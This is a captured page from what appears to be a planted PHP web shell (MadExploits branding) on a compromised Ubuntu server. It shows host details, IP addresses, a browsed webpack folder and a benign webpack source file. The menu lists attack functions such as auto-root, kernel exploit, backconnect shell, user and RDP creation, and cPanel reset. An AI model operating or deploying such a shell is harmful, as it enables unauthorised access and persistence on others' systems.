Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.189
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
webpack /
lib /
esm /
[ HOME SHELL ]
Name
Size
Permission
Action
ExportWebpackRequireRuntimeMod...
643
B
-rw-rw-rw-
ModuleChunkFormatPlugin.js
6.38
KB
-rw-rw-rw-
ModuleChunkLoadingPlugin.js
2.79
KB
-rw-rw-rw-
ModuleChunkLoadingRuntimeModul...
11.25
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ExportWebpackRequireRuntimeModule.js
/* MIT License http://www.opensource.org/licenses/mit-license.php */ "use strict"; const RuntimeGlobals = require("../RuntimeGlobals"); const RuntimeModule = require("../RuntimeModule"); class ExportWebpackRequireRuntimeModule extends RuntimeModule { constructor() { super("export webpack runtime", RuntimeModule.STAGE_ATTACH); } /** * @returns {boolean} true, if the runtime module should get it's own scope */ shouldIsolate() { return false; } /** * @returns {string | null} runtime code */ generate() { return `export default ${RuntimeGlobals.require};`; } } module.exports = ExportWebpackRequireRuntimeModule;
Close